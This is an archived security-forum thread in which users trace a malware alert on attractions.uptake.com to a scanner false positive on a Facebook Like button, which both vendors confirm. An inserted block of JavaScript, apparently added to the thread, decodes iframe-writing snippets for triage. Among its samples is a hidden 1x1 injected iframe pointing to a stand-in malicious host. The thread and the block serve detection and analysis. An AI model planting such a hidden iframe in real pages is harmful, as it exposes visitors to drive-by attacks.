Avast WEBforum

Other => Viruses and worms => Topic started by: !Donovan on November 30, 2011, 11:25:45 PM

Title: [SOLVED] attractions.uptake.com ~New Threat?~
Post by: !Donovan on November 30, 2011, 11:25:45 PM
I was doing some research for my project when I stumbled upon this site. VirusTotal reported Avira only detected it, as shown here:
http://www.virustotal.com/file-scan/report.html?id=6a211a33e80eb62f4ef1b96f0574d06ac94082cf1b5f4defe1ce4bd14f594832-1322690872

Sucuri also says it contains malware:
web site:    attractions(DOT)uptake(DOT)com
status:    Site infected with malware
web trust:     Not Blacklisted
warn:    Wordpress version outdated: Upgrade required.

Known javascript malware.
Details: -http://sucuri.net/malware/entry/MW:IFRAME:HD5

Code:
document.write(unescape('%3Ciframe src="http://www.facebook.com/plugins/like.php?href=' + thispageURL + ...
Donovansrb10
Title: Re: attractions.uptake.com ~New Threat?~
Post by: doug_uptake on December 01, 2011, 12:50:46 AM
I am a developer at uptake.com.  Can you give me some details on the exact url where you found this?  I assume it is a post somewhere at http://attractions.uptake.com/blog/*.

We would like to

1) Scrub the code, understand how it was injected, take steps to keep it from happening again.
2) Upgrade our version of Wordpress if necessary.

Thanks,
Doug Seifert
Uptake Networks, Inc.
Title: Re: attractions.uptake.com ~New Threat?~
Post by: Pondus on December 01, 2011, 01:02:47 AM
Quote
Can you give me some details on the exact url where you found this?
he already has  ::)
Title: Re: attractions.uptake.com ~New Threat?~
Post by: !Donovan on December 01, 2011, 04:38:02 AM
1) Scrub the code, understand how it was injected, take steps to keep it from happening again.
2) Upgrade our version of Wordpress if necessary.

You can upgrade Wordpress to reduce the risk of having the site hijacked again.
Title: Re: attractions.uptake.com ~New Threat?~
Post by: polonus on December 01, 2011, 04:49:48 PM
Hi doug_uptake,

Follow Donovansrb10's advice and update your website software to avoid and reduce the chance of re-infection.
Also pay attention to this code that was flagged as suspicious:
-uptake-blogs.s3.amazonaws.com/themes/uptake4/javascripts/site.js suspicious
[suspicious:2] (ipaddr:72.21.211.171) (script) -uptake-blogs.s3.amazonaws.com/themes/uptake4/javascripts/site.js
     status: (referer=-attractions.uptake.com/blog/)saved 80392 bytes ce100fa33adfe4728c9002e13cf26a7d867940d1
     info: [javascript variable] URL=
     info: [javascript variable] URL=-boss.yahooapis.com/ysearch/images/v1/
     info: [javascript variable] URL=-api.search.live.net/json.aspx?appid=
     info: [img] -uptake-blogs.s3.amazonaws.com/themes/uptake4/javascripts/
     info: [decodingLevel=0] found JavaScript
     error: undefined variable jQuery
     error: undefined variable $.event
     error: line:1: SyntaxError: missing ; before statement:
          error: line:1: var $.event = 1;
          error: line:1: ....^
     suspicious: maxruntime exceeded 10 seconds (incomplete) 0 bytes

polonus
Title: Re: attractions.uptake.com ~New Threat?~
Post by: polonus on December 01, 2011, 07:56:36 PM
Hi Donovansrb10,

Make that link to -http://sucuri.net/malware/malware-entry-mwiframehd5 non-click-through, please, because the avast Webshield flags HTML:iFrame-EE[Trj], and rightly so. Even at descriptions of malcode or look-ups the avast shields may sound the alarm as the non-munged code example gets recognized, notwithstanding the fact that it does not infect from there. Similar happened to me on several occasions when visiting the jsunpack online service to analyze script or trying to open a particular piece of malcode on a URL through my Malzilla browser. We know why this is, my friend, but the unaware forum visitor that clicks that description link may panic because he does not understand the avast shield reaction,

polonus
Title: Re: attractions.uptake.com ~New Threat?~
Post by: spg SCOTT on December 01, 2011, 08:16:59 PM
Why does Sucuri alert on a facebook like box?

Especially as the malware entry that it links to is nothing to do with FB.

The MW:IFRAME:HD5 code on the page decodes to something completely unrelated.
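
An added example to illustrate the point above; this is not code from the thread, from Sucuri, or from uptake.com. A scanner that matches on the `document.write(unescape('%3Ciframe ...'))` shape alone cannot tell a Like-button embed from an injected frame. The helper below actually runs the snippet against a stub `document`, captures what it would write, and judges each resulting iframe by its destination host and whether it is hidden or sized to 1x1. Both snippets are constructed samples in the shape of the flagged code (the `thispageURL` value, the `&layout=standard` parameter, the trusted-host list and the `malicious.example` host are all assumptions made for the demonstration).

```javascript
// Assumption for this example: the hosts this site legitimately embeds in iframes.
const TRUSTED_IFRAME_HOSTS = new Set(["www.facebook.com"]);

// %XX / %uXXXX decoding, supplied explicitly so the run does not depend on the
// host environment's (deprecated) global unescape().
function legacyUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (_, u, b) =>
    String.fromCharCode(parseInt(u !== undefined ? u : b, 16)));
}

// Execute the snippet with a stub document and return everything it writes.
// new Function() is used for brevity on constructed samples; real samples from a
// compromised site belong in an isolated sandbox (separate process or the vm module).
function captureDocumentWrite(snippet, thispageURL) {
  const written = [];
  const fakeDocument = { write: (html) => written.push(String(html)) };
  new Function("document", "thispageURL", "unescape", snippet)(
    fakeDocument, thispageURL, legacyUnescape);
  return written.join("");
}

// Pull every <iframe> tag out of the decoded markup with the attributes we care about.
function extractIframes(html) {
  const frames = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = m[1];
    const src = (attrs.match(/\bsrc\s*=\s*["']([^"']*)["']/i) || [])[1] || "";
    const style = (attrs.match(/\bstyle\s*=\s*["']([^"']*)["']/i) || [])[1] || "";
    const width = (attrs.match(/\bwidth\s*=\s*["']?(\d+)/i) || [])[1];
    const height = (attrs.match(/\bheight\s*=\s*["']?(\d+)/i) || [])[1];
    frames.push({
      src,
      style,
      width: width !== undefined ? Number(width) : null,
      height: height !== undefined ? Number(height) : null,
    });
  }
  return frames;
}

function hostOf(src) {
  try { return new URL(src).hostname; } catch { return null; }
}

// Verdict per frame: a visible embed of a trusted host is a widget; a hidden or
// 1x1 frame is the classic injected-iframe shape; anything else needs a look.
function classifyIframe(frame) {
  const host = hostOf(frame.src);
  if (host === null) return "malformed-src";
  const hidden = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(frame.style)
    || (frame.width !== null && frame.width <= 1)
    || (frame.height !== null && frame.height <= 1);
  if (hidden) return "hidden-iframe";
  return TRUSTED_IFRAME_HOSTS.has(host) ? "benign-widget" : "unknown-host";
}

// Decode the snippet and classify each iframe it would write.
function triage(snippet, thispageURL) {
  return extractIframes(captureDocumentWrite(snippet, thispageURL))
    .map((f) => ({ host: hostOf(f.src), verdict: classifyIframe(f) }));
}

// Constructed sample 1: a Like-button embed in the same shape as the flagged snippet.
const LIKE_BUTTON_SNIPPET = `document.write(unescape('%3Ciframe src="http://www.facebook.com/plugins/like.php?href=' + thispageURL + '&layout=standard" width="450" height="80"%3E%3C/iframe%3E'));`;

// Constructed sample 2: what an injected frame usually looks like (off-site, 1x1, hidden).
const INJECTED_SNIPPET = `document.write(unescape('%3Ciframe src="http://malicious.example/in.php" width="1" height="1" style="display:none"%3E%3C/iframe%3E'));`;

const PAGE = "http://attractions.uptake.com/blog/";
console.log(triage(LIKE_BUTTON_SNIPPET, PAGE)); // host www.facebook.com, benign-widget
console.log(triage(INJECTED_SNIPPET, PAGE));    // host malicious.example, hidden-iframe
```

The two samples decode to the same `document.write` + `unescape` + `<iframe` pattern, which is exactly what a signature like MW:IFRAME:HD5 keys on; only after decoding and looking at where the frame points, and whether a user could see it, do they separate. That is the "go directly to the code" check rather than trusting a pattern match.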

Title: Re: attractions.uptake.com ~New Threat?~
Post by: Pondus on December 01, 2011, 09:48:10 PM
Norman lab
Quote
attractions.uptake.com.htm - Clean!
Title: Re: attractions.uptake.com ~New Threat?~
Post by: polonus on December 01, 2011, 10:55:01 PM
Hi Pondus,

Also given clean here: http://urlquery.net/report.php?id=10206
and here: http://wepawet.iseclab.org/view.php?hash=dce20df22b857b454ffe81ef34df249b&t=1322776345&type=js

polonus
Title: Re: attractions.uptake.com ~New Threat?~
Post by: Pondus on December 01, 2011, 11:04:36 PM
was going to post a FP case at Avira but the web seems down at the moment.....
Title: Re: attractions.uptake.com ~New Threat?~
Post by: polonus on December 01, 2011, 11:52:19 PM
Hi Pondus and spg SCOTT,

I do not see any iFrame that goes to -nuotoll.com,
see:  http://www.google.com/safebrowsing/diagnostic?site=nuotoll.com/   as spg SCOTT pointed out in the image from SUCURI's he provided for us. For nuotoll dot com unmasked parasites informs that under certain circumstances third parties could add malicious code to legit sites for which Google Safe Browsing delivers this alert,

polonus
Title: Re: attractions.uptake.com ~New Threat?~
Post by: spg SCOTT on December 02, 2011, 12:20:52 AM
My point exactly. Sucuri highlights a facebook like button script as a malicious iframe.

It is not similar in any way.

Is there a way to report something like this to Sucuri?
Title: Re: attractions.uptake.com ~New Threat?~
Post by: polonus on December 02, 2011, 12:41:20 AM
Hi spg SCOTT,

I assume you could give a reaction on the blog they have going: http://blog.sucuri.net/
It qualifies somewhere under misdetection or false positive. At least it needs explanation.
I see sucuri as one of the better website monitoring scanning services, but they also meet with mistakes, omissions and have to clean out their daily dirt. Never take any detection for granted, always check with other scanners or go directly to the code as you do. That is the lesson we can take here.
Thank you very much, spg SCOTT, for diving into this issue and for the insight gained.
But we also should praise the young Donovansrb10 for starting this thread on this apparent new threat here. He sort of has put his HTML-homework to a good purpose if he stumbled upon a sucuri misdetection,

polonus

 
Title: Re: attractions.uptake.com ~New Threat?~
Post by: spg SCOTT on December 02, 2011, 08:04:09 PM
I found a contact email, and sent them an email. In under 30 minutes, I received this.

Not only is the scanning service very useful, they are very quick once notified :)

Scott

Quote
Hi Scott,

Thanks for sending the link to us. It is indeed a false positive and the scanner was fixed already, so it will not alert on it anymore.

Sorry for the confusion.

Thanks,

Title: Re: attractions.uptake.com ~New Threat?~
Post by: Pondus on December 02, 2011, 09:54:25 PM
and from Avira lab
Quote
The file 'attractions.uptake.com.htm' has been determined to be 'FALSE POSITIVE'. In particular this means that this file is not malicious but a false alarm. Our analysts named the threat HTML/Rce.Gen. The term "HTML/" denotes a script-virus that is able to infect the system using a HTML script. Detection will be removed from our virus definition file (VDF) with one of the next updates.